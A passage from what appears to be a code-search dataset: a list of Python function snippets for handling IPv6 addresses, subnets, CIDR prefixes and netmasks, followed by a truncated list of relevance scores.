"def PrefixIpv6Address(self):\n if self.force_auto_sync:\n self.get('PrefixIpv6Address')\n return self._PrefixIpv6Address",
"def local_ipv6_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def ipv6_connected_prefix(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv6_connected_prefix\")",
"def ipv6_address_space(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_address_space\")",
"def ipv6_address_space(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv6_address_space\")",
"def remote_ipv6_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"remote_ipv6_network_cidr\")",
"def remote_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv6_network_cidr\")",
"def remote_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv6_network_cidr\")",
"def ipv6_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_address\")",
"def ipv6_cidr_block_association_id(self) -> str:\n return pulumi.get(self, \"ipv6_cidr_block_association_id\")",
"def subnet_prefix(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"subnet_prefix\")",
"def toV6(self):\n return V6Address.fromV4(self)",
"def ipv6_address(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"use `ipv6_addresses` attribute instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: use `ipv6_addresses` attribute instead\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def GlobalIpv6Address(self):\n if self.force_auto_sync:\n self.get('GlobalIpv6Address')\n return self._GlobalIpv6Address",
"def ipv6_address(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"use `ipv6_addresses` attribute instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: use `ipv6_addresses` attribute instead\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def ipv6_address(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def ipv6_address(self) -> str:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def Ipv6Flag(self):\r\n\t\treturn self._get_attribute('ipv6Flag')",
"def Ipv6Srh(self):\r\n\t\treturn self._get_attribute('ipv6Srh')",
"def ipv6_gateway_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ipv6_gateway_id\")",
"def ipv6_networks(view):\n return \"ipv6network?\" \\\n \"_return_fields=\" \\\n \"extattrs,\" \\\n \"comment,\" \\\n \"network,\" \\\n \"network_view,\" \\\n \"utilization&\" \\\n \"network_view=\" + view + \\\n \"&_max_results=-25000\"",
"def LinkLocalIpv6Address(self):\n if self.force_auto_sync:\n self.get('LinkLocalIpv6Address')\n return self._LinkLocalIpv6Address",
"def ipv6_gateway_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_gateway_id\")",
"def get_ipv6_zone_connection(self):\n return self.m_connection.ipv6_zones",
"def ipv6_address(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def Ipv6rate(self):\n\t\treturn self._get_attribute('ipv6rate')",
"def ipv6_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"ipv6_addresses\")",
"def get_ipv6_list():\n ipv6 = __grains__.get(\"ipv6\")\n\n return \" \".join([\"[\" + ip + \"]\" for ip in ipv6])",
"def get_main_ipv6():\n try:\n # No data is actually transmitted (UDP)\n s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)\n s.connect( ('2001:4860:4860::8888', 53) )\n real_ip = s.getsockname()[0]\n s.close()\n return real_ip\n except socket.error as e:\n logging.error(\"Cannot retrieve current IPv6 address: %s\" % e)\n return None",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def to_network_v6(zone: Zone) -> ipaddress.IPv6Network:\n\n labels = zone.name.split(\".\")[:-3]\n\n zone_reverse_str = \"\".join(reversed(labels))\n if len(zone_reverse_str) % 4 != 0:\n for _ in range(4 - (len(zone_reverse_str) % 4)):\n zone_reverse_str += \"0\"\n prefix_str = \":\".join(\n [zone_reverse_str[i : i + 4] for i in range(0, len(zone_reverse_str), 4)]\n )\n prefix_str += f\"::/{len(labels) * 4}\"\n\n return ipaddress.IPv6Network(prefix_str, strict=True)",
"def ipv6_bandwidth(self):\n return self._ipv6_bandwidth",
"def _get_virtual_oper_VipV6_address(self):\n return self.__virtual_oper_VipV6_address",
"def allocate_subnet(self):\n if len(self.subnet_list) == 0:\n subnet = '192.168.1.0/24'\n self.subnet_list.append(subnet)\n return subnet\n else:\n subnet = self.subnet_list[::-1][0]\n ip = ipaddress.IPv4Network(subnet)[0]\n s = ipaddress.IPv4Address(ip) + 256\n return '{}{}'.format(s, '/24')",
"def sc_subnet(self):\n return self._sc_subnet",
"def test_ip4_cidr_syntax_internal_v6(self):\n \n test_ip = ip_address.IPAddress(\"192.168.0.1/24\")\n \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 192, 168, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/16\") \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/8\")\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1\")\n assert test_ip.subnet == []",
"def ipv6_to_ipv4(ipv6_str):\n return '.'.join([str(b) for b in ipv6_str[12:]])",
"def subnet_prefix_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"subnet_prefix_length\")",
"def get_if_raw_addr6(iff):\n ip6 = get_if_addr6(iff)\n if ip6 is not None:\n return inet_pton(socket.AF_INET6, ip6)\n\n return None",
"def get_global_ip_ipv6():\n network_info_providers = [\n 'http://v6.ipv6-test.com/api/myip.php',\n 'http://v6.ident.me/',\n ]\n random.shuffle(network_info_providers)\n for url in network_info_providers:\n try:\n return requests.get(url).text.lstrip().rstrip()\n except Exception:\n continue\n else:\n log.info('cannot find global ipv6 ip')\n return \"\"",
"def get_intf_address(self, intf, pod, v6=False):\n if v6:\n cmd = [\"ifconfig \" + intf + \" | grep Global\"]\n output = pod.run_cmd_on_vm(cmd)\n ip6 = re.search(\n r'inet6\\s+addr\\s*:\\s*(\\S*)',\n output['ifconfig eth0 | grep Global'])\n ip6_addr = ip6.group(1)\n return ip6_addr\n cmd = [\"ifconfig \" + intf + \" | grep inet\"]\n output = pod.run_cmd_on_vm(cmd)\n ip = re.search(\n r'inet\\s+addr\\s*:\\s*(\\d+.\\d+.\\d+.\\d+)',\n output['ifconfig eth0 | grep inet'])\n ip_addr = ip.group(1)\n return ip_addr",
"def ipv6_addresses(self) -> Dict[str, List[IPv6Address]]:\n log.debug(\"Host %s: ipv6 addresses of the devices interfaces %s.\", self.host, self._get_ipv6_addresses(\"self\"))\n return self._get_ipv6_addresses(\"self\")",
"def test_ipv6_in_net(self):\n test_ip = ip_address.IPAddress(\"2001:0db8:85a3:08d3:1319:8a2e:0370:7344/24\")\n assert test_ip.in_network(\"2001:0d00::/24\")\n assert test_ip.in_network(\"2001:0d00::/29\")",
"def ipv4_connected_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_connected_prefix\")",
"def _rloc_ip_net_addr(self):\n self.net_addr = ':'.join(self.rloc.split(':')[:-1]) + ':'\n return self.net_addr",
"def associate_ipv6_address(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"associate_ipv6_address\")",
"def ip_address_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address_prefix\")",
"def ipv6_addresses(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"ipv6_addresses\")",
"def ipv6_networkcontainers(view):\n return \"ipv6networkcontainer?\" \\\n \"_return_fields=\" \\\n \"extattrs,\" \\\n \"comment,\" \\\n \"network,\" \\\n \"network_view,\" \\\n \"utilization&\" \\\n \"network_view=\" + view + \\\n \"&_max_results=-25000\"",
"def c6(self):\n return self._c6",
"def get_netmask(self):\n return self.get_ipv4_netmask()",
"def format_ipv6(value, mask):\n value_ipv6 = \":\".join(re.findall('..', \"{:032x}\".format(value)))\n if mask is None:\n return value_ipv6\n value_mask = \":\".join(re.findall('..', \"{:032x}\".format(mask)))\n return \"{}/{}\".format(value_ipv6, value_mask)",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def SupportsIPv6(self) -> bool:",
"def local_ipv4_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def _FixIPv6Address(self, netblocks):\n new_list = []\n length = len(netblocks)\n if length > 0:\n number_ipv6 = 0\n for netblock in netblocks:\n if netblock.version == 4:\n new_list.append(netblock)\n elif netblock.version == 6:\n number_ipv6 += 1\n if number_ipv6 == length:\n return True, new_list\n return False, new_list",
"def ipv4_connected_prefix(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv4_connected_prefix\")",
"def NumberOfMappingIPV6Ranges(self):\r\n\t\treturn self._get_attribute('numberOfMappingIPV6Ranges')",
"def get_rug_address():\n net = netaddr.IPNetwork(ULA_PREFIX)\n return str(netaddr.IPAddress(net.first + 1))",
"def prefixlen(self):\n return self._ip_range.prefixlen",
"def enable_ipv6(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_ipv6\")",
"def get_management_address(self, ensure_configuration=False):\n primary = self.get_interface(GENERIC_IFNAME + '0')\n prefix, prefix_len = ULA_PREFIX.split('/', 1)\n eui = netaddr.EUI(primary.lladdr)\n ip_str = str(eui.ipv6_link_local()).replace('fe80::', prefix[:-1])\n\n if not primary.is_up:\n self.up(primary)\n\n ip = netaddr.IPNetwork('%s/%s' % (ip_str, prefix_len))\n if ensure_configuration and ip not in primary.addresses:\n primary.addresses.append(ip)\n self.update_interface(primary)\n return ip_str",
"def ipv6(self, ipv6):\n\n self._ipv6 = ipv6",
"def assign_ipv6_address_on_creation(self) -> bool:\n return pulumi.get(self, \"assign_ipv6_address_on_creation\")",
"def reverse_prefix(self):\n if self.type == ZONE_REVERSE_IPV4:\n # Get IPv4 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".in-addr.arpa\"):\n r = n[:-13].split(\".\")\n r.reverse()\n length = 4 - len(r)\n r += [\"0\"] * length\n ml = 32 - 8 * length\n return \".\".join(r) + \"/%d\" % ml\n elif self.type == ZONE_REVERSE_IPV6:\n # Get IPv6 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".ip6.int\"):\n n = n[:-8]\n elif n.endswith(\".ip6.arpa\"):\n n = n[:-9]\n else:\n raise Exception(\"Invalid IPv6 zone suffix\")\n p = n.split(\".\")\n p.reverse()\n length = len(p)\n if length % 4:\n p += [\"0\"] * (4 - length % 4)\n r = \"\"\n for i, c in enumerate(p):\n if i and i % 4 == 0:\n r += \":\"\n r += c\n if len(p) != 32:\n r += \"::\"\n prefix = r + \"/%d\" % (length * 4)\n return IPv6(prefix).normalized.prefix",
"def ipv4_to_ipv6(v6_network: Union[str, ipaddress.IPv6Network], v4_address: Union[str, ipaddress.IPv4Interface]):\n if isinstance(v6_network, str):\n v6_network = ipaddress.IPv6Network(v6_network)\n if isinstance(v4_address, str):\n v4_address = ipaddress.IPv4Address(v4_address)\n\n v6_address = v6_network[int(v4_address)]\n return ipaddress.IPv6Interface(f\"{v6_address}/{v6_network.prefixlen}\")",
"def ipv6_cmd(args):\n r = requete(\"Devices:get\")\n for i in r['status']:\n a = \"-\"\n if 'IPv6Address' in i:\n for j in i['IPv6Address']:\n if j['Scope'] != 'link':\n a = j['Address']\n b = \"-\"\n if 'IPAddress' in i: b = i['IPAddress']\n if a == \"-\": continue\n print(\"%4s %-32s %-5s %-16s %s\" % (i['Index'], i['Name'], i['Active'], b, a))",
"def OSSupportsIPv6(self) -> bool:",
"def ipv4(self):\n return Network(private=True).ipv4",
"def local_address(self) -> T_SockAddr:\n from anyio._core._sockets import convert_ipv6_sockaddr\n return convert_ipv6_sockaddr(self.raw_socket.getsockname())",
"def get_netmask(self):\n return self.get_ip_network().netmask",
"def is_net_ip6(value):\n for test in [lambda x: ipaddress.IPv6Network(x)._prefixlen != 128,\n lambda x: ipaddress.IPv6Interface(x)._prefixlen != 128]:\n try:\n return bool(test(value))\n\n except:\n pass\n\n return False",
"def filter_netmask(prefix):\n try:\n prefix_str = unicode(prefix)\n except NameError as ex:\n prefix_str = str(prefix)\n return IPv4Network(\"1.0.0.0/\"+prefix_str).netmask",
"def get_appgw_subnet_cidr(self) -> Union[str, None]:\n # determine the value of constants\n addon_consts = self.get_addon_consts()\n CONST_INGRESS_APPGW_ADDON_NAME = addon_consts.get(\"CONST_INGRESS_APPGW_ADDON_NAME\")\n CONST_INGRESS_APPGW_SUBNET_CIDR = addon_consts.get(\"CONST_INGRESS_APPGW_SUBNET_CIDR\")\n\n # read the original value passed by the command\n appgw_subnet_cidr = self.raw_param.get(\"appgw_subnet_cidr\")\n # try to read the property value corresponding to the parameter from the `mc` object\n if (\n self.mc and\n self.mc.addon_profiles and\n CONST_INGRESS_APPGW_ADDON_NAME in self.mc.addon_profiles and\n self.mc.addon_profiles.get(\n CONST_INGRESS_APPGW_ADDON_NAME\n ).config.get(CONST_INGRESS_APPGW_SUBNET_CIDR) is not None\n ):\n appgw_subnet_cidr = self.mc.addon_profiles.get(\n CONST_INGRESS_APPGW_ADDON_NAME\n ).config.get(CONST_INGRESS_APPGW_SUBNET_CIDR)\n\n # this parameter does not need dynamic completion\n # this parameter does not need validation\n return appgw_subnet_cidr",
"def name(self):\n return 'Destination Options for IPv6'",
"def __init__(self, address, netmask=None):\n\n if netmask:\n ip = Ipv6Address(address)\n address = \"%s/%s\" % (ip,netmask)\n\n google.ipaddr.IPv6Network.__init__(self, address, strict=False)",
"def ip6_cidr_range(ingress, debug=False):\n if debug:\n print('ip6_cidr_range ' + str(ingress) + lineno())\n print('type: ' + str(type(ingress)) + lineno())\n if hasattr(ingress, '__dict__'):\n print('vars: ' + str(vars(ingress)) + lineno())\n\n suffix = \"/128\";\n\n if type(ingress) == type(dict()):\n\n if debug:\n print('ingress is a dict: ' + lineno())\n\n if 'CidrIp' in ingress:\n\n if debug:\n print('CiderIp in ingress '+lineno())\n\n if type(ingress['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(ingress['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress['CidrIp']:\n return True\n\n elif ingress['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif sys.version_info[0] < 3 and type(ingress['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(ingress['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress['CidrIp']:\n return True\n\n elif ingress['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress) == type(list()):\n\n for item in ingress:\n if 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n if sys.version_info[0] < 3 and type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif hasattr(ingress, 'cidrIpv6'):\n\n if type(ingress.cidrIpv6) == type(str()):\n\n if debug:\n print('ip is: ' + str(ingress.cidrIpv6) + lineno())\n\n if type(ingress.cidrIpv6) == type(list()):\n\n for item in ingress:\n if 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n if sys.version_info[0] < 3:\n if type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress.cidrIpv6) == type(dict()):\n\n for item in ingress.cidrIp:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6[item]:\n return True\n\n elif ingress.cidrIpv6[item].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n elif type(ingress.cidrIpv6) == type(str()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif sys.version_info[0] < 3 and type(ingress.cidrIpv6) == type(unicode()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n else:\n print('not sure what this is')\n print('need to fix')\n sys.exit(1)\n\n elif sys.version_info[0] < 3 and type(ingress.cidrIpv6) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(ingress.cidrIpv6) + lineno())\n\n if type(ingress.cidrIpv6) == type(list()):\n\n for item in ingress:\n if 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n if sys.version_info[0] < 3:\n if type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress.cidrIpv6) == type(dict()):\n\n for item in ingress.cidrIp:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6[item]:\n return True\n\n elif ingress.cidrIpv6[item].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n elif type(ingress.cidrIpv6) == type(str()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif sys.version_info[0] < 3 and type(ingress.cidrIpv6) == type(unicode()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n else:\n print('not sure what this is')\n print('need to fix')\n sys.exit(1)\n\n else:\n if debug:\n print('ip is: ' + str(ingress.cidrIpv6) + lineno())\n print('type: ' + str(type(ingress.cidrIpv6)) + lineno())\n\n if type(ingress.cidrIpv6) == type(list()):\n\n has_invalid_cidr = False\n\n for item in ingress.cidrIpv6:\n\n if debug:\n print('list item: ' + str(item) + lineno())\n\n if type(item) == type(dict()):\n\n for item2 in item:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item[item2]:\n return True\n\n elif item2 == 'Ref':\n return True\n\n elif item[item2].endswith(suffix):\n if debug:\n print('ip ends with /32' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /32' + lineno())\n return False\n\n elif 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n has_invalid_cidr = True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n has_invalid_cidr = False\n\n if sys.version_info[0] < 3:\n if type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n has_invalid_cidr = True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n has_invalid_cidr = False\n\n return has_invalid_cidr\n\n else:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return True\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress) == type(str()):\n if debug:\n print('is a str ' + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress:\n return True\n\n elif ingress.endswith('/128'):\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n elif sys.version_info[0] < 3 and type(ingress) == type(unicode()):\n if debug:\n print('is a str ' + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress:\n return True\n\n elif ingress.endswith('/128'):\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n return False",
"def get_mask_ipv6(bits):\n\n if bits > 128 or bits < 0:\n raise ValueError('A mask can only be 0-128 bits, got %i' % bits)\n elif bits == 128:\n return FULL_IPv6_MASK\n\n # get the binary representation of the mask\n mask_bin = _get_binary(2 ** bits - 1, 128)[::-1]\n\n # breaks it into sixteen character groupings\n groupings = [mask_bin[16 * i:16 * (i + 1)] for i in range(8)]\n\n # converts each group into its hex value\n return ':'.join(['%04x' % int(group, 2) for group in groupings]).upper()",
"def cidr(self):\n return self._cidr",
"def NoOfAddressPrefix(self):\n return self._get_attribute('noOfAddressPrefix')",
"def find_ipv6():\n\n test_host = '2600::' # Sprint.net\n try:\n with socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) as s:\n s.connect((test_host, 53))\n ipv6 = s.getsockname()[0]\n except:\n if cfg['debug']:\n print(\"Couldn't create a socket to %s\" % test_host)\n print(\"Check that you have a valid IPv6 default route\")\n ipv6 = None\n\n return ipv6",
"def network(self):\n address = unicode(\"%s/%s\" % (self.address, _get_cidr(self.netmask)))\n return IPv4Network(address, strict=False)",
"def allocation_min_netmask_length(self) -> pulumi.Output[Optional[int]]:\n return pulumi.get(self, \"allocation_min_netmask_length\")",
"def get_ipv6_host(self, host):\n\n try:\n host = u'{0}'.format(host)\n return IPv6Network(host, strict=False)\n except ValueError as e:\n error_msg = \"Given host {0} is an invalid IPv6 format -- \" \\\n \"error {1}\".format(host, str(e))\n LOG.error(error_msg)\n self.module.fail_json(msg=error_msg)",
"def ipv6_native(self) -> bool:\n return pulumi.get(self, \"ipv6_native\")",
"def remote_ip_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ip_prefix\")",
"def remote_ip_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ip_prefix\")",
"def update_gateway_with_prefixlen(self, ipv4='', ipv4_prefixlen=0, \n ipv6='', ipv6_prefixlen=0, port_no=''):\n port = self.ports[port_no]\n\n if port.gateway is None:\n port.gateway = Gateway(name=port.name, port_no=port.port_no,\n ipv4=ipv4, ipv4_prefixlen=ipv4_prefixlen,\n ipv6=ipv6, ipv6_prefixlen=ipv6_prefixlen)\n else:\n port.gateway.name = port.name\n port.gateway.ipv4 = netaddr.IPAddress(ipv4)\n port.gateway.ipv4_subnet = netaddr.IPNetwork(ipv4 + '/' + str(ipv4_prefixlen))\n port.gateway.ipv6 = netaddr.IPAddress(ipv6)\n port.gateway.ipv6_subnet = netaddr.IPNetwork(ipv6 + '/' + str(ipv6_prefixlen))\n port.gateway.port_no = port.port_no\n\n self.tbl.update_entry(subnet=port.gateway.ipv4_subnet, receive_port=port, metric=0, source=\"CONNECTED\")",
"def alias(self):\n return 'IPv6-Opts'",
"def get_if_addr6(iff):\n return next((x[0] for x in in6_getifaddr()\n if x[2] == iff and x[1] == IPV6_ADDR_GLOBAL), None)",
"def ipv6_access_type(self) -> Optional[pulumi.Input['IPAllocationPolicyIpv6AccessType']]:\n return pulumi.get(self, \"ipv6_access_type\")",
"def allocation_min_netmask_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"allocation_min_netmask_length\")",
"def allocation_min_netmask_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"allocation_min_netmask_length\")",
"def is_ipv6(cluster_config):\n cluster = load_cluster_config_json(cluster_config)\n return cluster[\"environment\"][\"ipv6_enabled\"]",
"def network(ip):\n ip, prefix = netParse(ip)\n return \"{}/{}\".format(\n ipStr(ip & (0xffffffff << (32 - prefix))),\n prefix\n )",
"def subnetting(self):\n ip = netaddr.IPNetwork(addr=self.subnet)\n subnets = list(ip.subnet(prefixlen=24))\n list_subnets = [str(subnet) for subnet in subnets]\n return list_subnets",
"def cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr\")"
] | [
"0.7729275",
"0.76980174",
"0.76423615",
"0.76423615",
"0.7312516",
"0.6983688",
"0.6952086",
"0.69470865",
"0.6910834",
"0.6910834",
"0.6771784",
"0.65345484",
"0.6393636",
"0.6392489",
"0.634702",
"0.6326751",
"0.6292675",
"0.6250887",
"0.62504554",
"0.6245007",
"0.6242389",
"0.62111634",
"0.61639744",
"0.6129926",
"0.61279005",
"0.6124118",
"0.6123404",
"0.6011149",
"0.6000404",
